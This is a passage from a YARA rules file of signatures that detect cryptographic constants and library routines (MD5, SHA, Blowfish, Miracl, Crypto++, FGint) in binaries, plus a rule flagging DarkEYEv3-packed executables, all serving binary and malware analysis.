45 F0 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB 12 E9 ?? ?? ?? ?? 8B 45 08 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 F0 33 D2 89 55 F0 E8 ?? ?? ?? ?? C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Elf_Hash {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for ElfHash\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.3\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 33 C9 8B DA 4B 85 DB 7C 25 43 C1 E1 04 33 D2 8A 10 03 CA 8B D1 81 E2 00 00 00 F0 85 D2 74 07 8B F2 C1 EE 18 33 CE F7 D2 23 CA 40 4B 75 DC 8B C1 5E 5B C3 }\r\n\t\t$c1 = { 53 33 D2 85 C0 74 2B EB 23 C1 E2 04 81 E1 FF 00 00 00 03 D1 8B CA 81 E1 00 00 00 F0 85 C9 74 07 8B D9 C1 EB 18 33 D3 F7 D1 23 D1 40 8A 08 84 C9 75 D7 8B C2 5B C3 }\r\n\t\t$c2 = { 53 56 33 C9 8B D8 85 D2 76 23 C1 E1 04 33 C0 8A 03 03 C8 8B C1 25 00 00 00 F0 85 C0 74 07 8B F0 C1 EE 18 33 CE F7 D0 23 C8 43 4A 75 DD 8B C1 5E 5B C3 }\r\n\t\t$c3 = { 53 56 57 8B F2 8B D8 8B FB 53 E8 ?? ?? ?? ?? 6B C0 02 71 05 E8 ?? ?? ?? ?? 8B D7 33 C9 8B D8 83 EB 01 71 05 E8 ?? ?? ?? ?? 85 DB 7C 2C 43 C1 E1 04 0F B6 02 03 C8 71 05 E8 ?? ?? ?? ?? 83 C2 01 B8 00 00 00 F0 23 C1 85 C0 74 07 8B F8 C1 EF 18 33 CF F7 D0 23 C8 4B 75 D5 8B C1 99 F7 FE 8B C2 85 C0 7D 09 03 C6 71 05 E8 ?? ?? ?? ?? 5F 5E 5B C3 }\r\n\t\t$c4 = { 53 33 D2 EB 2C 8B D9 80 C3 BF 80 EB 1A 73 03 80 C1 20 C1 E2 04 81 E1 FF 00 00 00 03 D1 8B CA 81 E1 00 00 00 F0 8B D9 C1 EB 18 33 D3 F7 D1 23 D1 40 8A 08 84 C9 75 CE 8B C2 5B C3 }\r\n\t\t$c5 = { 89 C2 31 C0 85 D2 74 30 2B 42 FC 74 2B 89 C1 29 C2 31 C0 53 0F B6 1C 11 01 C3 8D 04 1B C1 EB 14 8D 04 C5 00 00 00 00 81 E3 00 0F 00 00 31 D8 83 C1 01 75 E0 C1 E8 04 5B C3 }\r\n\t\t$c6 = { 53 33 D2 85 C0 74 38 EB 30 8B D9 80 C3 BF 80 EB 1A 73 03 80 C1 20 C1 E2 04 81 E1 FF 00 00 00 03 D1 8B CA 81 E1 00 00 00 F0 85 C9 74 07 8B D9 C1 EB 18 33 D3 F7 D1 23 D1 40 8A 08 84 C9 75 CA 8B C2 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule BLOWFISH_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for Blowfish constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { D1310BA6 }\r\n\t\t$c1 = { A60B31D1 }\t\r\n\t\t$c2 = { 98DFB5AC }\r\n\t\t$c3 = { ACB5DF98 }\r\n\t\t$c4 = { 2FFD72DB }\r\n\t\t$c5 = { DB72FD2F }\r\n\t\t$c6 = { D01ADFB7 }\r\n\t\t$c7 = { B7DF1AD0 }\r\n\t\t$c8 = { 4B7A70E9 }\r\n\t\t$c9 = { E9707A4B }\r\n\t\t$c10 = { F64C261C }\r\n\t\t$c11 = { 1C264CF6 }\r\n\tcondition:\r\n\t\t6 of them\r\n}\r\n\r\nrule MD5_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for MD5 constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.2\"\r\n\tstrings:\r\n\t\t// Init constants\r\n\t\t$c0 = { 67452301 }\r\n\t\t$c1 = { efcdab89 }\r\n\t\t$c2 = { 98badcfe }\r\n\t\t$c3 = { 10325476 }\r\n\t\t$c4 = { 01234567 }\r\n\t\t$c5 = { 89ABCDEF }\r\n\t\t$c6 = { FEDCBA98 }\r\n\t\t$c7 = { 76543210 }\r\n\t\t// Round 2\r\n\t\t$c8 = { F4D50d87 }\r\n\t\t$c9 = { 78A46AD7 }\r\n\tcondition:\r\n\t\t5 of them\r\n}\r\n\r\nrule MD5_API {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for MD5 API\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$advapi32 = \"advapi32.dll\" wide ascii nocase\r\n\t\t$cryptdll = \"cryptdll.dll\" wide ascii nocase\r\n\t\t$MD5Init = \"MD5Init\" wide ascii\r\n\t\t$MD5Update = \"MD5Update\" wide ascii\r\n\t\t$MD5Final = \"MD5Final\" wide ascii\r\n\tcondition:\r\n\t\t($advapi32 or $cryptdll) and ($MD5Init and $MD5Update and $MD5Final)\r\n}\r\n\r\nrule RC6_Constants {\r\n\tmeta:\r\n\t\tauthor = \"chort (@chort0)\"\r\n\t\tdescription = \"Look for RC6 magic constants in binary\"\r\n\t\treference = \"https://twitter.com/mikko/status/417620511397400576\"\r\n\t\treference2 = \"https://twitter.com/dyngnosis/status/418105168517804033\"\r\n\t\tdate = \"2013-12\"\r\n\t\tversion = \"0.2\"\r\n\tstrings:\r\n\t\t$c1 = { B7E15163 }\r\n\t\t$c2 = { 9E3779B9 }\r\n\t\t$c3 = { 6351E1B7 }\r\n\t\t$c4 = { B979379E }\r\n\tcondition:\r\n\t\t2 of them\r\n}\r\n\r\nrule RIPEMD160_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for RIPEMD-160 constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 67452301 }\r\n\t\t$c1 = { EFCDAB89 }\r\n\t\t$c2 = { 98BADCFE }\r\n\t\t$c3 = { 10325476 }\r\n\t\t$c4 = { C3D2E1F0 }\r\n\t\t$c5 = { 01234567 }\r\n\t\t$c6 = { 89ABCDEF }\r\n\t\t$c7 = { FEDCBA98 }\r\n\t\t$c8 = { 76543210 }\r\n\t\t$c9 = { F0E1D2C3 }\r\n\tcondition:\r\n\t\t5 of them\r\n}\r\n\r\nrule SHA1_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for SHA1 constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 67452301 }\r\n\t\t$c1 = { EFCDAB89 }\r\n\t\t$c2 = { 98BADCFE }\r\n\t\t$c3 = { 10325476 }\r\n\t\t$c4 = { C3D2E1F0 }\r\n\t\t$c5 = { 01234567 }\r\n\t\t$c6 = { 89ABCDEF }\r\n\t\t$c7 = { FEDCBA98 }\r\n\t\t$c8 = { 76543210 }\r\n\t\t$c9 = { F0E1D2C3 }\r\n\t\t//added by _pusher_ 2016-07 - last round\r\n\t\t$c10 = { D6C162CA }\r\n\tcondition:\r\n\t\t5 of them\r\n}\r\n\r\nrule SHA512_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for SHA384/SHA512 constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 428a2f98 }\r\n\t\t$c1 = { 982F8A42 }\r\n\t\t$c2 = { 71374491 }\r\n\t\t$c3 = { 91443771 }\r\n\t\t$c4 = { B5C0FBCF }\r\n\t\t$c5 = { CFFBC0B5 }\r\n\t\t$c6 = { E9B5DBA5 }\r\n\t\t$c7 = { A5DBB5E9 }\r\n\t\t$c8 = { D728AE22 }\r\n\t\t$c9 = { 22AE28D7 }\r\n\tcondition:\r\n\t\t5 of them\r\n}\r\n\r\nrule TEAN {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for TEA Encryption\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n\t\t$c0 = { 2037EFC6 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule WHIRLPOOL_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for WhirlPool constants\"\r\n\t\tdate = \"2014-02\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 18186018c07830d8 }\r\n\t\t$c1 = { d83078c018601818 }\r\n\t\t$c2 = { 23238c2305af4626 }\r\n\t\t$c3 = { 2646af05238c2323 }\r\n\tcondition:\r\n\t\t2 of them\r\n}\r\n\r\nrule DarkEYEv3_Cryptor {\r\n\tmeta:\r\n\t\tdescription = \"Rule to detect DarkEYEv3 encrypted executables (often malware)\"\r\n\t\tauthor = \"Florian Roth\"\r\n\t\treference = \"http://darkeyev3.blogspot.fi/\"\r\n\t\tdate = \"2015-05-24\"\r\n\t\thash0 = \"6b854b967397f7de0da2326bdd5d39e710e2bb12\"\r\n\t\thash1 = \"d53149968eca654fc0e803f925e7526fdac2786c\"\r\n\t\thash2 = \"7e3a8940d446c57504d6a7edb6445681cca31c65\"\r\n\t\thash3 = \"d3dd665dd77b02d7024ac16eb0949f4f598299e7\"\r\n\t\thash4 = \"a907a7b74a096f024efe57953c85464e87275ba3\"\r\n\t\thash5 = \"b1c422155f76f992048377ee50c79fe164b22293\"\r\n\t\thash6 = \"29f5322ce5e9147f09e0a86cc23a7c8dc88721b9\"\r\n\t\thash7 = \"a0382d7c12895489cb37efef74c5f666ea750b05\"\r\n\t\thash8 = \"f3d5b71b7aeeb6cc917d5bb67e2165cf8a2fbe61\"\r\n\t\tscore = 55\r\n\tstrings:\r\n\t\t$s0 = \"\\\\DarkEYEV3-\" \r\n\tcondition:\r\n\t\tuint16(0) == 0x5a4d and $s0\r\n}\r\n\r\nrule Miracl_powmod\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl powmod\"\r\n\tstrings:\r\n\t\t$c0 = { 53 55 56 57 E8 ?? ?? ?? ?? 8B F0 8B 86 18 02 00 00 85 C0 0F 85 EC 01 00 00 8B 56 1C 42 8B C2 89 56 1C 83 F8 18 7D 17 C7 44 86 20 12 00 00 00 8B 86 2C 02 00 00 85 C0 74 05 E8 ?? ?? ?? ?? 8B 06 8B 4E 10 3B C1 74 2E 8B 7C 24 1C 57 E8 ?? ?? ?? ?? 83 C4 04 83 F8 02 7C 33 8B 57 04 8B 0E 51 8B 02 50 E8 ?? ?? ?? ?? 83 C4 08 83 F8 01 0F 84 58 01 00 00 EB 17 8B 7C 24 1C 6A 02 57 E8 ?? ?? ?? ?? 83 C4 08 85 C0 0F 84 3F 01 00 00 8B 8E C4 01 00 00 8B 54 24 18 51 52 E8 ?? ?? ?? ?? 8B 86 CC }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Miracl_crt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl crt\"\r\n\tstrings:\r\n\t\t$c0 = { 51 56 57 E8 ?? ?? ?? ?? 8B 74 24 10 8B F8 89 7C 24 08 83 7E 0C 02 0F 8C 99 01 00 00 8B 87 18 02 00 00 85 C0 0F 85 8B 01 00 00 8B 57 1C 42 8B C2 89 57 1C 83 F8 18 7D 17 C7 44 87 20 4A 00 00 00 8B 87 2C 02 00 00 85 C0 74 05 E8 ?? ?? ?? ?? 8B 46 04 8B 54 24 14 53 55 8B 08 8B 02 51 50 E8 ?? ?? ?? ?? 8B 4E 0C B8 01 00 00 00 83 C4 08 33 ED 3B C8 89 44 24 18 0F 8E C5 00 00 00 BF 04 00 00 00 8B 46 04 8B 0C 07 8B 10 8B 44 24 1C 51 52 8B 0C 07 51 E8 ?? ?? ?? ?? 8B 56 04 8B 4E 08 8B 04 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CryptoPP_a_exp_b_mod_c\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP a_exp_b_mod_c\"\r\n\tstrings:\r\n\t\t$c0 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 81 EC ?? 00 00 00 56 8B B4 24 B0 00 00 00 57 6A 00 8B CE C7 44 24 0C 00 00 00 00 E8 ?? ?? ?? ?? 84 C0 0F 85 16 01 00 00 8D 4C 24 24 E8 ?? ?? ?? ?? BF 01 00 00 00 56 8D 4C 24 34 89 BC 24 A4 00 00 00 E8 ?? ?? ?? ?? 8B 06 8D 4C 24 3C 50 6A 00 C6 84 24 A8 00 00 00 02 E8 ?? ?? ?? ?? 8D 4C 24 48 C6 84 24 A0 00 00 00 03 E8 ?? ?? ?? ?? C7 44 24 24 ?? ?? ?? ?? 8B 8C 24 AC 00 00 00 8D 54 24 0C 51 52 8D 4C 24 2C C7 84 24 A8 }\r\n\t\t$c1 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 4C 56 57 33 FF 8D 44 24 0C 89 7C 24 08 C7 44 24 10 ?? ?? ?? ?? C7 44 24 0C ?? ?? ?? ?? 89 44 24 14 8B 74 24 70 8D 4C 24 18 56 89 7C 24 60 E8 ?? ?? ?? ?? 8B 76 08 8D 4C 24 2C 56 57 C6 44 24 64 01 E8 ?? ?? ?? ?? 8D 4C 24 40 C6 44 24 5C 02 E8 ?? ?? ?? ?? C7 44 24 0C ?? ?? ?? ?? 8B 4C 24 6C 8B 54 24 68 8B 74 24 64 51 52 56 8D 4C 24 18 C7 44 24 68 03 00 00 00 E8 ?? ?? ?? ?? 8B 7C 24 4C 8B 4C 24 48 8B D7 33 C0 F3 }\r\n\t\t$c2 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 34 56 57 33 FF 8D 44 24 0C 89 7C 24 08 C7 44 24 10 ?? ?? ?? ?? C7 44 24 0C ?? ?? ?? ?? 89 44 24 14 8B 74 24 58 8D 4C 24 18 56 89 7C 24 48 E8 ?? ?? ?? ?? 8B 0E C6 44 24 44 01 51 57 8D 4C 24 2C E8 ?? ?? ?? ?? 8D 4C 24 30 C6 44 24 44 02 E8 ?? ?? ?? ?? C7 44 24 0C ?? ?? ?? ?? 8B 54 24 54 8B 44 24 50 8B 74 24 4C 52 50 56 8D 4C 24 18 C7 44 24 50 03 00 00 00 E8 ?? ?? ?? ?? 8B 4C 24 30 8B 7C 24 34 33 C0 F3 AB 8B 4C }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule CryptoPP_modulo\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP modulo\"\r\n\tstrings:\r\n\t\t$c0 = { 83 EC 20 53 55 8B 6C 24 2C 8B D9 85 ED 89 5C 24 08 75 18 8D 4C 24 0C E8 ?? ?? ?? ?? 8D 44 24 0C 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D FF 56 85 CD 57 75 09 8B 53 04 8B 02 23 C1 EB 76 8B CB E8 ?? ?? ?? ?? 83 FD 05 8B C8 77 2D 33 F6 33 FF 49 85 C0 74 18 8B 53 04 8D 41 01 8D 14 8A 8B 0A 03 F1 83 D7 00 48 83 EA 04 85 C0 77 F1 6A 00 55 57 56 E8 ?? ?? ?? ?? EB 3B 33 C0 8B D1 49 85 D2 74 32 8B 54 24 10 33 DB 8D 71 01 8B 52 04 8D 3C 8A 8B 17 33 ED 0B C5 8B 6C 24 34 33 C9 53 0B CA 55 }\r\n\t\t$c1 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 2C 56 57 8B F1 33 FF 8D 4C 24 20 89 7C 24 08 E8 ?? ?? ?? ?? 8D 4C 24 0C 89 7C 24 3C E8 ?? ?? ?? ?? 8B 44 24 48 8D 4C 24 0C 50 56 8D 54 24 28 51 52 C6 44 24 4C 01 E8 ?? ?? ?? ?? 8B 74 24 54 83 C4 10 8D 44 24 20 8B CE 50 E8 ?? ?? ?? ?? 8B 7C 24 18 8B 4C 24 14 8B D7 33 C0 F3 AB 52 E8 ?? ?? ?? ?? 8B 7C 24 30 8B 4C 24 2C 8B D7 33 C0 C7 44 24 10 ?? ?? ?? ?? 52 F3 AB E8 ?? ?? ?? ?? 8B 4C 24 3C 83 C4 08 8B C6 64 89 }\r\n\t\t$c2 = { 83 EC 24 53 55 8B 6C 24 30 8B D9 85 ED 89 5C 24 08 75 18 8D 4C 24 0C E8 ?? ?? ?? ?? 8D 44 24 0C 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D FF 56 85 CD 57 75 09 8B 53 0C 8B 02 23 C1 EB 76 8B CB E8 ?? ?? ?? ?? 83 FD 05 8B C8 77 2D 33 F6 33 FF 49 85 C0 74 18 8B 53 0C 8D 41 01 8D 14 8A 8B 0A 03 F1 83 D7 00 48 83 EA 04 85 C0 77 F1 6A 00 55 57 56 E8 ?? ?? ?? ?? EB 3B 33 C0 8B D1 49 85 D2 74 32 8B 54 24 10 33 DB 8D 71 01 8B 52 0C 8D 3C 8A 8B 17 33 ED 0B C5 8B 6C 24 38 33 C9 53 0B CA 55 }\r\n\t\t$c3 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 1C 56 57 8B F1 33 FF 8D 4C 24 0C 89 7C 24 08 E8 ?? ?? ?? ?? 8D 4C 24 18 89 7C 24 2C E8 ?? ?? ?? ?? 8B 44 24 38 8D 4C 24 18 50 56 8D 54 24 14 51 52 C6 44 24 3C 01 E8 ?? ?? ?? ?? 8B 74 24 44 83 C4 10 8D 44 24 0C 8B CE 50 E8 ?? ?? ?? ?? 8B 4C 24 18 8B 7C 24 1C 33 C0 F3 AB 8B 4C 24 1C 51 E8 ?? ?? ?? ?? 8B 4C 24 10 8B 7C 24 14 33 C0 F3 AB 8B 54 24 14 52 E8 ?? ?? ?? ?? 8B 4C 24 2C 83 C4 08 8B C6 64 89 0D 00 00 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule FGint_MontgomeryModExp\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.2\"\r\n\t\tdescription = \"FGint MontgomeryModExp\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 8B F1 8B DA 89 45 ?? 8B 7D 08 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 D4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF 8B D6 8B 45 FC E8 ?? ?? ?? ?? 8D 55 D4 8B C7 E8 ?? ?? ?? ?? 3C 02 75 0D 8D 45 D4 E8 ?? ?? ?? ?? E9 }\r\n\t\t$c1 = { 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 8B F1 8B DA 89 45 ?? 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 D4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF 8B D6 8B 45 FC E8 ?? ?? ?? ?? 8D 55 D4 8B C7 E8 ?? ?? ?? ?? 3C 02 75 0D 8D 45 D4 E8 ?? ?? ?? ?? E9 }\r\n\t\t$c2 = { 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 8B F1 8B DA 89 45 ?? 8B 7D 08 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 D4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF 8B D6 8B 45 ?? E8 ?? ?? ?? ?? 8D 55 D4 8B C7 E8 ?? ?? ?? ?? 3C 02 75 0D 8D 45 D4 E8 ?? ?? ?? ?? E9 }\r\n\t\t$c3 = { 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 8B F1 8B DA 89 45 D0 8B 7D 08 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 47 4C 47 00 64 FF 30 64 89 20 8D 55 D4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF 8B D6 8B 45 D0 E8 ?? ?? ?? ?? 8D 55 D4 8B C7 E8 ?? ?? ?? ?? 3C 02 75 0D 8D 45 D4 E8 ?? ?? ?? ?? E9 02 02 00 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule FGint_FGIntModExp\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint FGIntModExp\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E8 53 56 57 33 DB 89 5D ?? 8B F1 89 55 ?? 8B D8 8B 7D 08 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 46 04 8B 40 04 83 E0 01 83 F8 01 75 0F 57 8B CE 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? EB ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 F4 8B C3 E8 ?? ?? ?? ?? 8B 45 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_MulByInt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint MulByInt\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 57 55 83 C4 E8 89 4C 24 04 8B EA 89 04 24 8B 04 24 8B 40 04 8B 00 89 44 24 08 8B 44 24 08 83 C0 02 50 8D 45 04 B9 01 00 00 00 8B 15 ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 04 33 F6 8B 7C 24 08 85 FF 76 6D BB 01 00 00 00 8B 04 24 8B 40 04 8B 04 98 33 D2 89 44 24 10 89 54 24 14 8B 44 24 04 33 D2 52 50 8B 44 24 18 8B 54 24 1C ?? ?? ?? ?? ?? 89 44 24 10 89 54 24 14 8B C6 33 D2 03 44 24 10 13 54 24 14 89 44 24 10 89 54 24 14 8B 44 24 10 25 FF FF FF 7F 8B 55 04 89 04 9A 8B 44 24 10 8B 54 24 14 0F AC D0 1F C1 EA 1F 8B F0 43 4F 75 98 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_DivMod\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint FGIntDivMod\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 BC 53 56 57 8B F1 89 55 F8 89 45 FC 8B 5D 08 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 FC 8A 00 88 45 D7 8B 45 F8 8A 00 88 45 D6 8B 45 FC E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 8B D3 8B 45 FC E8 ?? ?? ?? ?? 8D 55 E0 8B 45 F8 E8 ?? ?? ?? ?? 8B 55 F8 8B 45 FC }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_FGIntDestroy\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint FGIntDestroy\"\r\n\tstrings:\r\n\t\t$c0 = { 53 8B D8 8D 43 04 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_Base10StringToGInt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.2\"\r\n\t\tdescription = \"FGint Base10StringToGInt\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC B9 04 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 8B DA 89 45 FC 8B 45 FC ?? ?? ?? ?? ?? 33 C0 55 ?? ?? ?? ?? ?? 64 FF 30 64 89 20 EB 12 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 ?? ?? ?? ?? ?? 8B 45 FC 8A 00 2C 2D 74 11 04 FD 2C 0A 72 0B 8B 45 FC ?? ?? ?? ?? ?? 48 7F D4 8D 45 E4 50 B9 01 00 00 00 BA 01 00 00 00 8B 45 FC ?? ?? ?? ?? ?? 8B 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 75 18 C6 45 EB 00 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 ?? ?? ?? ?? ?? EB 18 C6 45 EB 01 EB 12 8D 45 FC }\r\n\t\t$c1 = { 55 8B EC 83 C4 D8 53 56 57 33 C9 89 4D D8 89 4D DC 89 4D E0 89 4D E4 89 4D EC 8B DA 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 33 C0 55 68 0F 42 45 00 64 FF 30 64 89 20 EB 12 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? 8B 45 FC 8A 00 2C 2D 74 11 04 FD 2C 0A 72 0B 8B 45 FC E8 ?? ?? ?? ?? 48 7F D4 8D 45 E4 50 B9 01 00 00 00 BA 01 00 00 00 8B 45 FC E8 ?? ?? ?? ?? 8B 45 E4 BA 28 42 45 00 E8 ?? ?? ?? ?? 75 18 C6 45 EB 00 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? EB 18 C6 45 EB 01 }\r\n\t\t$c2 = { 55 8B EC 83 C4 D8 53 56 33 C9 89 4D D8 89 4D DC 89 4D E0 89 4D F8 89 4D F4 8B DA 89 45 FC 8B 45 FC E8 ?? ?? ?? ?? 33 C0 55 68 A6 32 47 00 64 FF 30 64 89 20 EB 12 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? 8B 45 FC 0F B6 00 2C 2D 74 11 04 FD 2C 0A 72 0B 8B 45 FC E8 ?? ?? ?? ?? 48 7F D3 8D 45 E0 50 B9 01 00 00 00 BA 01 00 00 00 8B 45 FC E8 ?? ?? ?? ?? 8B 45 E0 BA BC 32 47 00 E8 ?? ?? ?? ?? 75 18 C6 45 E9 00 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 E8 ?? ?? ?? ?? EB 18 C6 45 E9 01 }\r\n\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule FGint_ConvertBase256to64\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint ConvertBase256to64\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 81 C4 EC FB FF FF 53 56 57 33 C9 89 8D EC FB FF FF 89 8D F0 FB FF FF 89 4D F8 8B FA 89 45 FC B9 00 01 00 00 8D 85 